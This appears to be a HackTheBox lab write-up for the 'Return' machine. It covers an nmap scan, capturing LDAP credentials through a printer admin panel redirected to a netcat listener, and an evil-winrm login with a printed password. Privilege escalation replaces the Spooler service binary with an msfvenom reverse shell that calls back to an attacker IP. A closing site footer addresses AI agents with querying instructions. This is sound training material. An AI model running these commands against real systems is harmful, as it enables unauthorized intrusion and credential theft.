# Return ## Nmap ``` nmap 10.10.11.108 -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-12 17:02:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49682/tcp open msrpc Microsoft Windows RPC 49694/tcp open msrpc Microsoft Windows RPC 64370/tcp open msrpc Microsoft Windows RPC Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows ``` {% hint style="info" %} Add "10.10.11.108 return.local" to /etc/hosts. {% endhint %} I ran through various standard Active Directory checks such as username and LDAP enumeration. I was not able to pick up results of interest. Checking our port 80 we come to the root page "HTB Printer Admin Panel". ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbW1muzO2kn2l5pL9D2Ox%2Fimage.png?alt=media\&token=97700727-574e-43bf-aa4d-43e2a66d7130) We also have an a page of interest under `/settings.php`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FR1rdFJ015i8GVNbX6kiZ%2Fimage.png?alt=media\&token=66305ea7-fbc9-47ac-a7dc-ab775da04754) Looking through the PHP source code we are unable to identify anything of interest to us. Opening up ZAP proxy and running the default settings through the "Update" button we get the output below. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjRLY1av7xVFjK9cWqk9Q%2Fimage.png?alt=media\&token=a218cf72-c7a5-45a0-96f6-a0c7994fff44) We can see in the body of the POST request we have the target systems hostname. From here I set a `nc` listener on my attacking system to the port specified in the `/settings.php` page. ```bash nc -lvp "127.0.0.1" -p "389" ``` Then edited the post request in ZAP Proxy to point back to my attacking system IP. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxWzzvzexkdWa7TIuISrv%2Fimage.png?alt=media\&token=0d9d80b6-f78c-49bd-8317-3276602957f1) And, after sending the request we are sent back a password for the account svc-printer. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDJhMjNkO9Bs3piWaG6Mx%2Fimage.png?alt=media\&token=0f07fde1-6ddc-4e40-9661-94b832241812) A quick test against `SMB` and `WinRM` with `crackmapexec` proves the credentials are valid. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLzMeueBPaiOvodTUonGp%2Fimage.png?alt=media\&token=bc5f1d29-d7f8-4b5c-bafd-cf749adfe1de) From here we can use `Evil WinRM` to log in as the svc-printer user. ``` evil-winrm -u svc-printer -p '1edFg43012!!' -i 10.10.11.108 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F6TusqyxRWZJnijgJ5cMo%2Fimage.png?alt=media\&token=b8e4bf6f-1c01-4e5c-85e4-dc3008fecdae) Now, with low level access on the Domain Controller we can look for path to privilege escalation. Doing some basic membership checks with `whoami /groups` shows we are a member of the "Server Operators" group. **Server Operators:** ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fh9Me3PhroFFPCwy5u1Zv%2Fimage.png?alt=media\&token=f2be1773-c561-45af-96cb-ba3956556a37) This group, gives user multiple interesting permissions. Namely, the ability to create, delete and reconfigure services. The medium article below shows a good outline on how to use this to escalate privileges. **URL:** On the target system at hand we will be doing this with the spooler service. We can use any server that is running in an elevated context however if we wish to. First we double check the intended binary path for the spooler service. ``` reg query HKLM\system\currentcontrolset\services\Spooler /s /v imagepath ``` We can then check the ACL's over the service. Below we see the owner is SYSTEM and the "Server Operators" group has the ability to "SetValue" which allows us to reconfigure the binary path. ``` get-acl HKLM:\system\currentcontrolset\services\Spooler | fl ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9QiEC6AQbrn7tqSWejbh%2Fimage.png?alt=media\&token=b91a54cc-71b7-41aa-b005-a09b4bcab250) On our attacking system we generate a x64 reverse shell executable. ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe -o reverse.exe ``` Then transfer over to the target system with `Evil WinRM`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F5v3ZPWFZzcJi0Eqmv1SN%2Fimage.png?alt=media\&token=10a466b8-2259-44fd-a3e9-fbd2f56dae37) From here we can add a registry value that changes the binary path to the payload we just uploaded. ``` REG add HKLM\System\CurrentControlSet\Services\spooler /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\svc-printer\Documents\reverse.exe" /f ``` a `nc` listener is set on the attacking system. ``` sudo nc -lvp 443 ``` Then a reboot is initiated on the target system. When the system reboots the Spooler service will come up and execute the reverse shell binary. ``` shutdown.exe -r -f -t 10 ``` Landing us a SYSTEM shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxLqo2E1S8n72LLOd6xmE%2Fimage.png?alt=media\&token=fc40bd24-0fc3-41fb-8798-19bb7f5b8085) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/active-directory/return.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.